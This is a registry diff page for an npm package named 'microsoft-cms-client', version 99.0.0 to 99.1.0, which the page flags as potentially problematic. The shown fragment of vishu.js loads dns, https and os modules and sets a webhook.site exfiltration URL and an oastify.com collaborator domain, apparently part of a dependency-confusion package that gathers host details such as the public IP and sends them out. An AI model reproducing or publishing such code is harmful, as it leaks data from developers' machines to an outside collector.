microsoft-cms-client 99.0.0 → 99.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of microsoft-cms-client might be problematic. Click here for more details.
- package/package.json +1 -1
- package/vishu.js +1 -1
package/package.json
CHANGED
package/vishu.js
CHANGED
|
@@ -2,7 +2,7 @@ const dns = require("dns");
|
|
|
2
2
|
const https = require("https");
|
|
3
3
|
const os = require("os");
|
|
4
4
|
|
|
5
|
-
const WEBHOOK_URL = "https://webhook.site/
|
|
5
|
+
const WEBHOOK_URL = "https://webhook.site/c07d4717-7e68-480c-8a1d-588d618ac0a7";
|
|
6
6
|
const COLLAB_DOMAIN = "your-collab-domain.oastify.com";
|
|
7
7
|
|
|
8
8
|
function getPublicIP(callback) {
|